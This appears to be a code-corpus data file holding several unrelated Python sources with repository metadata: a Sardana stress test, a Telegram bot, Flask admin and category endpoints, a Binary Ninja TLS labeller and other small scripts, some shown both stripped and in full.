# You should have received a copy of the GNU Lesser General Public License
# along with Sardana. If not, see <http://www.gnu.org/licenses/>.
##
##############################################################################
import os
import uuid
from unittest import TestCase
from tango import DevState
from taurus import Device
from taurus.test.base import insertTest
from .test_pool import is_numerical
from sardana.pool.pooldefs import AcqSynchType
from sardana.taurus.core.tango.sardana.pool import registerExtensions
from sardana.tango.pool.test.base_sartest import SarTestTestCase
@insertTest(helper_name="stress_count",
test_method_doc="stress count with CT (hardware trigger) and 0D",
elements=["_test_ct_1_1", "_test_0d_1_1"], repeats=100,
synchronizer="_test_tg_1_1", synchronization=AcqSynchType.Trigger)
@insertTest(helper_name="stress_count",
test_method_doc="stress count with CT (software trigger) and 0D",
elements=["_test_ct_1_1", "_test_0d_1_1"], repeats=100,
synchronizer="software", synchronization=AcqSynchType.Trigger)
@insertTest(helper_name="stress_count",
test_method_doc="stress count with CT (hardware start)",
elements=["_test_ct_1_1"], repeats=100,
synchronizer="_test_tg_1_1", synchronization=AcqSynchType.Start)
@insertTest(helper_name="stress_count",
test_method_doc="stress count with CT (software start)",
elements=["_test_ct_1_1"], repeats=100,
synchronizer="software", synchronization=AcqSynchType.Start)
@insertTest(helper_name="stress_count",
test_method_doc="stress count with CT (hardware trigger)",
elements=["_test_ct_1_1"], repeats=100,
synchronizer="_test_tg_1_1", synchronization=AcqSynchType.Trigger)
@insertTest(helper_name="stress_count",
test_method_doc="count with CT (software trigger)",
elements=["_test_ct_1_1"], repeats=100,
synchronizer="software", synchronization=AcqSynchType.Trigger)
class TestStressMeasurementGroup(SarTestTestCase, TestCase):
    """Stress tests for measurement groups; cases injected via @insertTest."""
    def setUp(self):
        SarTestTestCase.setUp(self)
        registerExtensions()  # enable the taurus sardana extensions used below
    def stress_count(self, elements, repeats, synchronizer, synchronization):
        """Create a throwaway measurement group and count ``repeats`` times.

        Verifies after every acquisition that the group returns to ON and
        that every channel value is numerical.
        """
        # Known-flaky combination on Windows — skipped rather than failed.
        if (elements == ["_test_ct_1_1", "_test_0d_1_1"]
                and synchronizer == "_test_tg_1_1"
                and synchronization == AcqSynchType.Trigger
                and os.name == "nt"):
            self.skipTest("fails on Windows")
        # Unique group name avoids collisions between repeated test runs.
        mg_name = str(uuid.uuid1())
        argin = [mg_name] + elements
        self.pool.CreateMeasurementGroup(argin)
        try:
            mg = Device(mg_name)
            # Configure the synchronizer on the first element only.
            mg.setSynchronizer(synchronizer, elements[0], apply=False)
            mg.setSynchronization(synchronization, elements[0])
            for i in range(repeats):
                state, values = mg.count(.001)
                self.assertEqual(state, DevState.ON,
                                 "wrong state after measurement {}".format(i))
                for channel_name, value in values.items():
                    msg = ("Value {} for {} is not numerical in "
                           "measurement {}").format(value, channel_name, i)
                    self.assertTrue(is_numerical(value), msg)
        finally:
            # Always clean up the device proxy; element deletion is skipped
            # on Windows (NOTE(review): presumably another platform quirk).
            mg.cleanUp()
            if os.name != "nt":
                self.pool.DeleteElement(mg_name)
    def tearDown(self):
        SarTestTestCase.tearDown(self)
| 1,305 | 39 | 103 |
c968e0d7921d29de8adfe7443a130ae7c6d0a721 | 989 | py | Python | bot_functions.py | lozik4/telegram_forward_message_bot | c38938e9cc54c3e460c0da84f62788a028d59a7c | [
"MIT"
] | null | null | null | bot_functions.py | lozik4/telegram_forward_message_bot | c38938e9cc54c3e460c0da84f62788a028d59a7c | [
"MIT"
] | null | null | null | bot_functions.py | lozik4/telegram_forward_message_bot | c38938e9cc54c3e460c0da84f62788a028d59a7c | [
"MIT"
] | null | null | null | import config
import telebot
bot = telebot.TeleBot(config.BOT_TOKEN)
@bot.message_handler(commands=['start'])
@bot.message_handler(content_types=["text"])
if __name__ == '__main__':
bot.polling(none_stop=True) | 32.966667 | 111 | 0.613751 | import config
import telebot
bot = telebot.TeleBot(config.BOT_TOKEN)
@bot.message_handler(commands=['start'])
def welcome(message):
    """Handle /start: forward a registration request for unregistered chats.

    If the chat is not yet in config.CHAT_LIST, the owner chat receives the
    chat id plus sender/chat details, and the requesting chat gets a
    confirmation message.
    """
    if int(message.chat.id) not in config.CHAT_LIST:
        # Notify the owner with enough context to identify the requester.
        bot.send_message(config.OWNER_CHAT_ID, str(message.chat.id) + ': ' +
                         f"{message.text} {message.from_user.first_name} "
                         f"{message.from_user.last_name} "
                         f"{message.from_user.username} "
                         f"{message.chat.title}")
        bot.send_message(message.chat.id, f"👍 Group registration request: {message.chat.title}, has been sent")
@bot.message_handler(content_types=["text"])
def forward_info_messages(message):
    """Broadcast a text message from the owner chat to every registered chat.

    Messages originating anywhere other than config.OWNER_CHAT_ID are
    ignored. Delivery is best-effort per chat.
    """
    if int(message.chat.id) == int(config.OWNER_CHAT_ID):
        text = message.text
        for chat_id in config.CHAT_LIST:
            try:
                bot.send_message(chat_id, text)
            except Exception:
                # Narrowed from a bare ``except`` and moved inside the loop:
                # one unreachable chat (bot kicked, chat deleted, ...) no
                # longer silently aborts the broadcast to the remaining
                # chats, and KeyboardInterrupt/SystemExit are not swallowed.
                pass
if __name__ == '__main__':
bot.polling(none_stop=True) | 728 | 0 | 44 |
d3e6742cee38d98b12987dc06da9bcb0ebcd9f0c | 1,535 | py | Python | src/simulation.py | bok/AI-with-Pyke | f56314679b7ade698237e585152b52a81d8ffbd4 | [
"WTFPL"
] | 10 | 2016-03-23T10:14:17.000Z | 2022-01-18T09:04:02.000Z | src/simulation.py | mhbashari/AI-with-Pyke | f56314679b7ade698237e585152b52a81d8ffbd4 | [
"WTFPL"
] | null | null | null | src/simulation.py | mhbashari/AI-with-Pyke | f56314679b7ade698237e585152b52a81d8ffbd4 | [
"WTFPL"
] | 3 | 2016-01-18T04:42:20.000Z | 2019-11-09T19:36:23.000Z | #!/usr/bin/python2
# -*- coding: utf-8 -*-
#####################################################################
# This program is free software. It comes without any warranty, to #
# the extent permitted by applicable law. You can redistribute it #
# and/or modify it under the terms of the Do What The Fuck You Want #
# To Public License, Version 2, as published by Sam Hocevar. See #
# http://sam.zoy.org/wtfpl/COPYING for more details. #
#####################################################################
# A single simulation to run.
from agent import UAgent
from object import UObject
from universe import Universe
alice = UAgent( name='Alice',
can_do=['take', 'ask_if', 'ask_ref'],
goals=
[
(('know', 'Alice', ('location', 'pipo', 'Alice')),),
],
knowledge=[],
max_length_plan = 3
)
bob = UAgent( name='Bob',
can_do=['move', 'inform_if', 'inform_ref'],
goals=[],
knowledge=
[
('know', 'Bob', ('location', 'pipo', 0))
]
)
pipo = UObject('pipo')
uni = Universe(3)
uni.add(alice, 0)
uni.add(bob, 2)
uni.add(pipo, 0)
print(uni)
finished = False
i = 0
nb_iteration_max = 5
while not finished and i < nb_iteration_max:
print 'Itération %d' % i
uni.step()
i += 1
finished = uni.all_satisfied
if i == nb_iteration_max:
print 'Maximum number of iterations reached.'
| 26.465517 | 72 | 0.50684 | #!/usr/bin/python2
# -*- coding: utf-8 -*-
#####################################################################
# This program is free software. It comes without any warranty, to #
# the extent permitted by applicable law. You can redistribute it #
# and/or modify it under the terms of the Do What The Fuck You Want #
# To Public License, Version 2, as published by Sam Hocevar. See #
# http://sam.zoy.org/wtfpl/COPYING for more details. #
#####################################################################
# A single simulation to run.
from agent import UAgent
from object import UObject
from universe import Universe
# Set up two agents with complementary capabilities: Alice can take/ask,
# Bob can move/inform. Alice's goal is to learn the location of 'pipo';
# Bob already knows it is at position 0.
alice = UAgent( name='Alice',
                can_do=['take', 'ask_if', 'ask_ref'],
                goals=
                [
                    (('know', 'Alice', ('location', 'pipo', 'Alice')),),
                ],
                knowledge=[],
                max_length_plan = 3
              )
bob = UAgent( name='Bob',
              can_do=['move', 'inform_if', 'inform_ref'],
              goals=[],
              knowledge=
              [
                  ('know', 'Bob', ('location', 'pipo', 0))
              ]
            )
pipo = UObject('pipo')
# A 3-cell universe: Alice at 0, Bob at 2, the object at 0.
uni = Universe(3)
uni.add(alice, 0)
uni.add(bob, 2)
uni.add(pipo, 0)
print(uni)
# Step the simulation until all agents' goals are satisfied, capped at 5
# iterations to guarantee termination. (Python 2 print statements below.)
finished = False
i = 0
nb_iteration_max = 5
while not finished and i < nb_iteration_max:
    print 'Itération %d' % i
    uni.step()
    i += 1
    finished = uni.all_satisfied
if i == nb_iteration_max:
    print 'Maximum number of iterations reached.'
| 0 | 0 | 0 |
d23ecf42866090a56ff27064afd591e5b295d316 | 296 | py | Python | exercise063.py | AlissonRaphael/python_exercises | 3f1185c4f2fff24c9fa2ffd6b60f90599044c985 | [
"MIT"
] | null | null | null | exercise063.py | AlissonRaphael/python_exercises | 3f1185c4f2fff24c9fa2ffd6b60f90599044c985 | [
"MIT"
] | null | null | null | exercise063.py | AlissonRaphael/python_exercises | 3f1185c4f2fff24c9fa2ffd6b60f90599044c985 | [
"MIT"
] | null | null | null | n = int(input('---- Sequência Fibonacci ----\nInsira a quantidade de termos: '))
t1 = 0
t2 = 1
print('{} -> {}'.format(t1, t2), end='')
contador = 3
while contador <= n+1:
t3 = t1 + t2
print(' -> {}'.format(t3) if contador != n+1 else ' -> Fim', end='')
t1 = t2
t2 = t3
contador += 1
| 21.142857 | 80 | 0.537162 | n = int(input('---- Sequência Fibonacci ----\nInsira a quantidade de termos: '))
t1 = 0
t2 = 1
print('{} -> {}'.format(t1, t2), end='')
contador = 3
while contador <= n+1:
t3 = t1 + t2
print(' -> {}'.format(t3) if contador != n+1 else ' -> Fim', end='')
t1 = t2
t2 = t3
contador += 1
| 0 | 0 | 0 |
bcea2a15e3045a7bb54691ccb2044393f7af6f60 | 5,506 | py | Python | pages/admin_pages.py | wilsonpe66/server-backend | 16665d810fe1829f5dacc67f396b7cecf5af042f | [
"BSD-3-Clause"
] | 1 | 2019-09-26T04:00:55.000Z | 2019-09-26T04:00:55.000Z | pages/admin_pages.py | wilsonpe66/server-backend | 16665d810fe1829f5dacc67f396b7cecf5af042f | [
"BSD-3-Clause"
] | 2 | 2020-06-05T21:58:55.000Z | 2021-06-10T21:45:08.000Z | pages/admin_pages.py | wilsonpe66/server-backend | 16665d810fe1829f5dacc67f396b7cecf5af042f | [
"BSD-3-Clause"
] | 1 | 2019-09-26T03:55:06.000Z | 2019-09-26T03:55:06.000Z | import json
from flask import Blueprint, flash, Markup, redirect, render_template, request,\
session
from libs import admin_authentication
from libs.admin_authentication import authenticate_admin_login,\
authenticate_admin_study_access, get_admins_allowed_studies, get_admins_allowed_studies_as_query_set,\
admin_is_system_admin
from libs.security import check_password_requirements
from database.models import Researcher, Study
admin_pages = Blueprint('admin_pages', __name__)
# TODO: Document.
@admin_pages.route('/choose_study', methods=['GET'])
@authenticate_admin_login
@admin_pages.route('/view_study/<string:study_id>', methods=['GET'])
@authenticate_admin_study_access
@admin_pages.route('/data-pipeline/<string:study_id>', methods=['GET'])
@authenticate_admin_study_access
"""########################## Login/Logoff ##################################"""
@admin_pages.route('/')
@admin_pages.route('/admin')
@admin_pages.route("/logout")
@admin_pages.route("/validate_login", methods=["GET", "POST"])
def login():
""" Authenticates administrator login, redirects to login page if authentication fails. """
if request.method == 'POST':
username = request.values["username"]
password = request.values["password"]
if Researcher.check_password(username, password):
admin_authentication.log_in_admin(username)
return redirect("/choose_study")
else:
flash("Incorrect username & password combination; try again.", 'danger')
return redirect("/")
@admin_pages.route('/manage_credentials')
@authenticate_admin_login
@admin_pages.route('/reset_admin_password', methods=['POST'])
@authenticate_admin_login
@admin_pages.route('/reset_download_api_credentials', methods=['POST'])
@authenticate_admin_login
| 37.202703 | 115 | 0.710316 | import json
from flask import Blueprint, flash, Markup, redirect, render_template, request,\
session
from libs import admin_authentication
from libs.admin_authentication import authenticate_admin_login,\
authenticate_admin_study_access, get_admins_allowed_studies, get_admins_allowed_studies_as_query_set,\
admin_is_system_admin
from libs.security import check_password_requirements
from database.models import Researcher, Study
admin_pages = Blueprint('admin_pages', __name__)
# TODO: Document.
@admin_pages.route('/choose_study', methods=['GET'])
@authenticate_admin_login
def choose_study():
allowed_studies = get_admins_allowed_studies_as_query_set()
# If the admin is authorized to view exactly 1 study, redirect to that study
if allowed_studies.count() == 1:
return redirect('/view_study/{:d}'.format(allowed_studies.values_list('pk', flat=True).get()))
# Otherwise, show the "Choose Study" page
allowed_studies_json = Study.query_set_as_native_json(allowed_studies)
return render_template(
'choose_study.html',
studies=allowed_studies_json,
allowed_studies=allowed_studies_json,
system_admin=admin_is_system_admin()
)
@admin_pages.route('/view_study/<string:study_id>', methods=['GET'])
@authenticate_admin_study_access
def view_study(study_id=None):
    """Render the detail page for one study: its participants and surveys.

    :param study_id: primary key of the Study (validated by the
        authenticate_admin_study_access decorator on the route).
    """
    study = Study.objects.get(pk=study_id)
    tracking_survey_ids = study.get_survey_ids_and_object_ids_for_study('tracking_survey')
    audio_survey_ids = study.get_survey_ids_and_object_ids_for_study('audio_survey')
    participants = study.participants.all()
    return render_template(
        'view_study.html',
        study=study,
        patients=participants,
        audio_survey_ids=audio_survey_ids,
        tracking_survey_ids=tracking_survey_ids,
        allowed_studies=get_admins_allowed_studies(),
        system_admin=admin_is_system_admin()
    )
@admin_pages.route('/data-pipeline/<string:study_id>', methods=['GET'])
@authenticate_admin_study_access
def view_study_data_pipeline(study_id=None):
    """Render the data-pipeline page for the given study."""
    study = Study.objects.get(pk=study_id)
    return render_template(
        'data-pipeline.html',
        study=study,
        allowed_studies=get_admins_allowed_studies(),
    )
"""########################## Login/Logoff ##################################"""
@admin_pages.route('/')
@admin_pages.route('/admin')
def render_login_page():
    """Show the login form; an already-authenticated admin skips to study selection."""
    if not admin_authentication.is_logged_in():
        return render_template('admin_login.html')
    return redirect("/choose_study")
@admin_pages.route("/logout")
def logout():
    """Clear the admin session and return to the login page."""
    admin_authentication.logout_loggedin_admin()
    return redirect("/")
@admin_pages.route("/validate_login", methods=["GET", "POST"])
def login():
    """ Authenticates administrator login, redirects to login page if authentication fails. """
    if request.method == 'POST':
        username = request.values["username"]
        password = request.values["password"]
        if Researcher.check_password(username, password):
            admin_authentication.log_in_admin(username)
            return redirect("/choose_study")
        flash("Incorrect username & password combination; try again.", 'danger')
    # Robustness fix: the original returned None on a GET request (the route
    # accepts GET), which Flask renders as a 500 error. Failed POSTs and
    # GETs now both land back on the login page.
    return redirect("/")
@admin_pages.route('/manage_credentials')
@authenticate_admin_login
def manage_credentials():
    """Render the credential-management page (password + API key resets)."""
    return render_template('manage_credentials.html',
                           allowed_studies=get_admins_allowed_studies(),
                           system_admin=admin_is_system_admin())
@admin_pages.route('/reset_admin_password', methods=['POST'])
@authenticate_admin_login
def reset_admin_password():
    """Change the logged-in admin's password after validating the request.

    Requires the current password, a new password meeting the password
    policy, and a matching confirmation; flashes a message and redirects
    back to /manage_credentials in every case.
    """
    username = session['admin_username']
    current_password = request.values['current_password']
    new_password = request.values['new_password']
    confirm_new_password = request.values['confirm_new_password']
    # The caller must prove knowledge of the current password first.
    if not Researcher.check_password(username, current_password):
        flash("The Current Password you have entered is invalid", 'danger')
        return redirect('/manage_credentials')
    # check_password_requirements flashes its own error message on failure.
    if not check_password_requirements(new_password, flash_message=True):
        return redirect("/manage_credentials")
    if new_password != confirm_new_password:
        flash("New Password does not match Confirm New Password", 'danger')
        return redirect('/manage_credentials')
    Researcher.objects.get(username=username).set_password(new_password)
    flash("Your password has been reset!", 'success')
    return redirect('/manage_credentials')
return redirect('/manage_credentials')
@admin_pages.route('/reset_download_api_credentials', methods=['POST'])
@authenticate_admin_login
def reset_download_api_credentials():
    """Regenerate the admin's Data-Download API key pair and display it once.

    The new access/secret keys are flashed as HTML (shown exactly once);
    they are not retrievable afterwards.
    """
    researcher = Researcher.objects.get(username=session['admin_username'])
    access_key, secret_key = researcher.reset_access_credentials()
    msg = """<h3>Your Data-Download API access credentials have been reset!</h3>
    <p>Your new <b>Access Key</b> is:
    <div class="container-fluid">
    <textarea rows="1" cols="85" readonly="readonly" onclick="this.focus();this.select()">%s</textarea></p>
    </div>
    <p>Your new <b>Secret Key</b> is:
    <div class="container-fluid">
    <textarea rows="1" cols="85" readonly="readonly" onclick="this.focus();this.select()">%s</textarea></p>
    </div>
    <p>Please record these somewhere; they will not be shown again!</p>""" \
        % (access_key, secret_key)
    # Markup() marks the HTML as safe so Flask/Jinja renders it un-escaped.
    flash(Markup(msg), 'warning')
    return redirect("/manage_credentials")
| 3,511 | 0 | 176 |
2a12aeb72a1c289e7972cf3e45dcc3adfaa7d325 | 471 | py | Python | app/webcamera.py | thomsen85/LegoPokerDealer | 89fbf0123d1f4463493801349ad8b5ab06705a83 | [
"MIT"
] | 4 | 2021-11-02T11:34:57.000Z | 2021-11-23T23:30:30.000Z | app/webcamera.py | thomsen85/LegoPokerDealer | 89fbf0123d1f4463493801349ad8b5ab06705a83 | [
"MIT"
] | 9 | 2021-11-16T22:59:17.000Z | 2021-11-17T16:59:51.000Z | app/webcamera.py | thomsen85/LegoPokerDealer | 89fbf0123d1f4463493801349ad8b5ab06705a83 | [
"MIT"
] | null | null | null | import cv2 | 26.166667 | 61 | 0.577495 | import cv2
class Webcamera:
    """Thin wrapper around the default OpenCV capture device (index 0)."""
    def __init__(self):
        self.cap = cv2.VideoCapture(0)
        # Frame dimensions as reported by the driver (floats per OpenCV API).
        self.width = self.cap.get(cv2.CAP_PROP_FRAME_WIDTH)
        self.height = self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
    def get_frame(self):
        """Return cv2's (ret, frame) pair, or None when the device is closed.

        NOTE(review): callers must handle both a (False, frame) tuple and a
        bare None -- consider unifying the failure return value.
        """
        if self.cap.isOpened():
            ret, frame = self.cap.read()
            return (ret, frame)
        else:
            return None
    def __del__(self):
        # Release the device handle when the wrapper is garbage-collected.
        if self.cap.isOpened():
            self.cap.release()
b697b66b0470d29f2c00ec28a6bf80479e97e41a | 1,047 | py | Python | thelma/repositories/rdb/mappers/stocksamplecreationiso.py | fogathmann/TheLMA | ac330a0005da4fea2f1387da9ff9938611ad1481 | [
"MIT"
] | 1 | 2020-07-12T22:47:58.000Z | 2020-07-12T22:47:58.000Z | thelma/repositories/rdb/mappers/stocksamplecreationiso.py | papagr/TheLMA | d2dc7a478ee5d24ccf3cc680888e712d482321d0 | [
"MIT"
] | null | null | null | thelma/repositories/rdb/mappers/stocksamplecreationiso.py | papagr/TheLMA | d2dc7a478ee5d24ccf3cc680888e712d482321d0 | [
"MIT"
] | 1 | 2020-07-12T22:40:36.000Z | 2020-07-12T22:40:36.000Z | """
This file is part of the TheLMA (THe Laboratory Management Application) project.
See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information.
Stock sample creation ISO mapper.
"""
from sqlalchemy.orm import relationship
from everest.repositories.rdb.utils import mapper
from thelma.entities.iso import ISO_TYPES
from thelma.entities.iso import IsoSectorPreparationPlate
from thelma.entities.iso import StockSampleCreationIso
__docformat__ = "reStructuredText en"
__all__ = ['create_mapper']
def create_mapper(iso_mapper, stock_sample_creation_iso_tbl):
"Mapper factory."
m = mapper(StockSampleCreationIso, stock_sample_creation_iso_tbl,
inherits=iso_mapper,
properties=dict(
iso_sector_preparation_plates=relationship(
IsoSectorPreparationPlate,
back_populates='iso',
cascade='all,delete,delete-orphan')),
polymorphic_identity=ISO_TYPES.STOCK_SAMPLE_GENERATION)
return m
| 33.774194 | 80 | 0.719198 | """
This file is part of the TheLMA (THe Laboratory Management Application) project.
See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information.
Stock sample creation ISO mapper.
"""
from sqlalchemy.orm import relationship
from everest.repositories.rdb.utils import mapper
from thelma.entities.iso import ISO_TYPES
from thelma.entities.iso import IsoSectorPreparationPlate
from thelma.entities.iso import StockSampleCreationIso
__docformat__ = "reStructuredText en"
__all__ = ['create_mapper']
def create_mapper(iso_mapper, stock_sample_creation_iso_tbl):
    """Create the ORM mapper for ``StockSampleCreationIso``.

    Inherits from the base ISO mapper and wires the one-to-many
    relationship to sector preparation plates (delete-orphan cascade).
    """
    plates_rel = relationship(IsoSectorPreparationPlate,
                              back_populates='iso',
                              cascade='all,delete,delete-orphan')
    return mapper(StockSampleCreationIso,
                  stock_sample_creation_iso_tbl,
                  inherits=iso_mapper,
                  properties=dict(iso_sector_preparation_plates=plates_rel),
                  polymorphic_identity=ISO_TYPES.STOCK_SAMPLE_GENERATION)
| 0 | 0 | 0 |
1db8e2d6ecfe2c414d16fb5ab0cc22df65dbf5d1 | 554 | py | Python | plynx/web/state.py | live-wire/plynx | ed29db2b7880ed512974cd98993587886763a5f5 | [
"Apache-2.0"
] | null | null | null | plynx/web/state.py | live-wire/plynx | ed29db2b7880ed512974cd98993587886763a5f5 | [
"Apache-2.0"
] | null | null | null | plynx/web/state.py | live-wire/plynx | ed29db2b7880ed512974cd98993587886763a5f5 | [
"Apache-2.0"
] | null | null | null | from plynx.db.service_state import get_master_state
from plynx.utils.common import JSONEncoder
from plynx.web.common import app, requires_auth, make_fail_response, handle_errors
@app.route('/plynx/api/v0/master_state', methods=['GET'])
@handle_errors
@requires_auth
| 30.777778 | 82 | 0.689531 | from plynx.db.service_state import get_master_state
from plynx.utils.common import JSONEncoder
from plynx.web.common import app, requires_auth, make_fail_response, handle_errors
@app.route('/plynx/api/v0/master_state', methods=['GET'])
@handle_errors
@requires_auth
def master_state():
    """Return the current master/service state as an encoded JSON payload.

    Requires an authenticated caller (``requires_auth``); on failure the
    error is logged and a generic failure response is returned.
    """
    try:
        return JSONEncoder().encode({
            'status': 'success',
            'master_state': get_master_state()
        })
    except Exception as e:
        # Broad catch is deliberate: the endpoint must always answer with a
        # well-formed payload instead of propagating a traceback.
        app.logger.error(e)
        return make_fail_response('Internal error: "{}"'.format(str(e)))
| 264 | 0 | 22 |
8dd65d8ff868d942dd315277a04f874fe386cf3e | 2,154 | py | Python | tls.py | 0x1F9F1/binja-msvc | be2577c22c8d37fd1e2e211f80b1c9a920705bd2 | [
"MIT"
] | 9 | 2019-02-08T10:01:39.000Z | 2021-04-29T12:27:34.000Z | tls.py | DatBrick/binja-msvc | 751ffc1450c569bad23ac67a761d0f1fbd4ca4c4 | [
"MIT"
] | 1 | 2019-07-04T20:09:57.000Z | 2019-07-12T11:10:15.000Z | tls.py | DatBrick/binja-msvc | 751ffc1450c569bad23ac67a761d0f1fbd4ca4c4 | [
"MIT"
] | 2 | 2019-03-03T13:00:14.000Z | 2020-05-01T05:35:04.000Z | from binaryninja import Symbol, Type, log
from binaryninja.enums import SymbolType
from .utils import BinjaStruct, read_pe_header, check_address
IMAGE_TLS_DIRECTORY32_t = BinjaStruct('<IIIIII', names = ('StartAddressOfRawData', 'EndAddressOfRawData', 'AddressOfIndex', 'AddressOfCallBacks', 'SizeOfZeroFill', 'Characteristics'))
IMAGE_TLS_DIRECTORY64_t = BinjaStruct('<QQQQII', names = ('StartAddressOfRawData', 'EndAddressOfRawData', 'AddressOfIndex', 'AddressOfCallBacks', 'SizeOfZeroFill', 'Characteristics'))
| 46.826087 | 183 | 0.730269 | from binaryninja import Symbol, Type, log
from binaryninja.enums import SymbolType
from .utils import BinjaStruct, read_pe_header, check_address
IMAGE_TLS_DIRECTORY32_t = BinjaStruct('<IIIIII', names = ('StartAddressOfRawData', 'EndAddressOfRawData', 'AddressOfIndex', 'AddressOfCallBacks', 'SizeOfZeroFill', 'Characteristics'))
IMAGE_TLS_DIRECTORY64_t = BinjaStruct('<QQQQII', names = ('StartAddressOfRawData', 'EndAddressOfRawData', 'AddressOfIndex', 'AddressOfCallBacks', 'SizeOfZeroFill', 'Characteristics'))
def read_tls_directory(view, address):
    """Read an IMAGE_TLS_DIRECTORY structure at ``address``.

    The 32- or 64-bit layout is selected from ``view.address_size``.
    Returns ``(tls_directory, next_address)``; raises ``NotImplementedError``
    for any other pointer width.
    """
    if view.address_size not in (4, 8):
        raise NotImplementedError()
    struct_t = IMAGE_TLS_DIRECTORY32_t if view.address_size == 4 else IMAGE_TLS_DIRECTORY64_t
    tls_directory, end_address = struct_t.read(view, address)
    return tls_directory, end_address
def label_tls(view):
    """Annotate the TLS data directory of a PE image in a Binary Ninja view.

    Reads data directory entry 9 (TLS) from the PE optional header; when
    present, defines a 'TlsData' byte array over the raw-data range and a
    32-bit 'TlsIndex' variable at the index slot.
    """
    pe = read_pe_header(view)
    # Data directory index 9 is the TLS entry (IMAGE_DIRECTORY_ENTRY_TLS).
    tls_data_directory = pe.OPTIONAL_HEADER.DATA_DIRECTORY[9]
    if tls_data_directory.Size:
        tls_directory, _ = read_tls_directory(view, view.start + tls_data_directory.VirtualAddress)
        if tls_directory is not None:
            tls_start_address = tls_directory['StartAddressOfRawData']
            tls_end_address = tls_directory['EndAddressOfRawData']
            # Only label the raw-data blob when the range is non-empty and
            # both endpoints map into the view.
            if (tls_start_address < tls_end_address) and check_address(view, tls_start_address) and check_address(view, tls_end_address):
                log.log_info('TLS Data @ 0x{0:X}'.format(tls_start_address))
                view.define_user_symbol(Symbol(SymbolType.DataSymbol, tls_start_address, 'TlsData'))
                view.define_user_data_var(tls_start_address, Type.array(Type.int(1, sign = False), tls_end_address - tls_start_address))
            tls_index_address = tls_directory['AddressOfIndex']
            if check_address(view, tls_index_address):
                log.log_info('TLS Index @ 0x{0:X}'.format(tls_index_address))
                view.define_user_symbol(Symbol(SymbolType.DataSymbol, tls_index_address, 'TlsIndex'))
                # The TLS index slot is a 4-byte unsigned integer.
                view.define_user_data_var(tls_index_address, Type.int(4, sign = False))
c726280e9627ceab9a71757a18662167f8f69d59 | 4,097 | py | Python | api/modules/categories.py | petrstehlik/pyngShop | 61591b9982742bf9aad9a0e270737415e5649fbb | [
"MIT"
] | 1 | 2018-02-07T19:22:38.000Z | 2018-02-07T19:22:38.000Z | api/modules/categories.py | petrstehlik/pyngShop | 61591b9982742bf9aad9a0e270737415e5649fbb | [
"MIT"
] | null | null | null | api/modules/categories.py | petrstehlik/pyngShop | 61591b9982742bf9aad9a0e270737415e5649fbb | [
"MIT"
] | null | null | null | """
Author: Frederik Muller, xmulle20@stud.fit.vutbr.cz
Author: Matej Vido, xvidom00@stud.fit.vutbr.cz
Date: 04/2017
"""
import bcrypt
from flask import request
from bson import json_util, ObjectId
import pymongo
from slugify import slugify
from api import auth, db
from api.module import Module
from api.models.models import Category, CategoryException
from api.role import Role
category = Module('categories', __name__, url_prefix='/categories', no_version=True)
@auth.required(Role.admin)
@auth.required(Role.admin)
def remove_category(category_id):
"""
Remove the category
"""
category = Category.query.get_or_404(category_id)
try:
db.db.session.delete(category)
db.db.session.commit()
except Exception as e:
db.db.session.rollback()
print(e)
raise CategoryException("Could not remove category from database")
tmp = category.to_dict()
return(json_util.dumps(tmp))
@auth.required(Role.admin)
category.add_url_rule('', view_func=get_categories, methods=['GET'])
category.add_url_rule('', view_func=add_category, methods=['POST'])
category.add_url_rule('/<string:category_id>', view_func=get_category, methods=['GET'])
category.add_url_rule('/<string:category_id>', view_func=edit_category, methods=['PUT'])
category.add_url_rule('/<string:category_id>', view_func=remove_category, methods=['DELETE'])
| 29.056738 | 93 | 0.742006 | """
Author: Frederik Muller, xmulle20@stud.fit.vutbr.cz
Author: Matej Vido, xvidom00@stud.fit.vutbr.cz
Date: 04/2017
"""
import bcrypt
from flask import request
from bson import json_util, ObjectId
import pymongo
from slugify import slugify
from api import auth, db
from api.module import Module
from api.models.models import Category, CategoryException
from api.role import Role
category = Module('categories', __name__, url_prefix='/categories', no_version=True)
def get_categories():
    """Return all top-level categories, each with its children, as JSON."""
    top_level = [cat for cat in Category.query.all() if cat.parent == None]
    payload = []
    for cat in top_level:
        entry = cat.to_dict()
        entry["children"] = cat.children_dict()
        payload.append(entry)
    return json_util.dumps(payload)
@auth.required(Role.admin)
def add_category():
    """Create a category from the request JSON body (admin only).

    Read-only/derived fields ("products", "children") are stripped; an
    optional "parent" object with an "id" attaches the new category to an
    existing parent. The slug is derived from the name. Returns the
    freshly inserted category (with its parent) as JSON.
    Raises CategoryException on conversion or database failure.
    """
    r = request.get_json()
    # Drop relationship fields the client may have echoed back.
    r.pop("products", [])
    r.pop("children", [])
    parent_dict = r.pop("parent", None)
    parent = None
    if parent_dict != None:
        parent_id = parent_dict.get("id", None)
        if parent_id != None:
            # 404s if the referenced parent does not exist.
            parent = Category.query.get_or_404(parent_id)
    try:
        category = Category.from_dict(r)
    except Exception as e:
        print(e)
        raise CategoryException("Could not convert dictionary to Category")
    try:
        if parent != None:
            parent.children.append(category)
        # Slug is always regenerated from the name on creation.
        category.slug = slugify(category.name, to_lower=True)
        db.db.session.add(category)
        res = db.db.session.commit()
    except Exception as e:
        # Roll back so the session stays usable for the next request.
        db.db.session.rollback()
        print(e)
        raise CategoryException("Could not add category to database")
    # Re-read the row so the response reflects DB-assigned state (e.g. id).
    inserted = Category.query.get_or_404(category.id)
    category = inserted.to_dict()
    category["parent"] = inserted.parent_dict()
    return(json_util.dumps(category))
@auth.required(Role.admin)
def remove_category(category_id):
    """Delete the category with ``category_id`` and return it as JSON."""
    doomed = Category.query.get_or_404(category_id)
    try:
        db.db.session.delete(doomed)
        db.db.session.commit()
    except Exception as e:
        db.db.session.rollback()
        print(e)
        raise CategoryException("Could not remove category from database")
    return json_util.dumps(doomed.to_dict())
@auth.required(Role.admin)
def edit_category(category_id):
    """Partially update a category from the request JSON body (admin only).

    Only non-empty fields in the payload are applied. Setting "name" also
    regenerates the slug (an explicit "slug" field then overrides it, since
    it is checked afterwards). An optional "parent" object re-parents the
    category when its "id" resolves. Returns the updated category with its
    parent, children and products as JSON.
    Raises CategoryException when the commit fails.
    """
    category_dict = request.get_json()
    category = Category.query.get_or_404(category_id)
    # check for all fields to be updated
    if "name" in category_dict and category_dict["name"]!= "":
        category.name = category_dict["name"]
        category.slug = slugify(category.name, to_lower=True)
    if "description" in category_dict and category_dict["description"] != "":
        category.description = category_dict["description"]
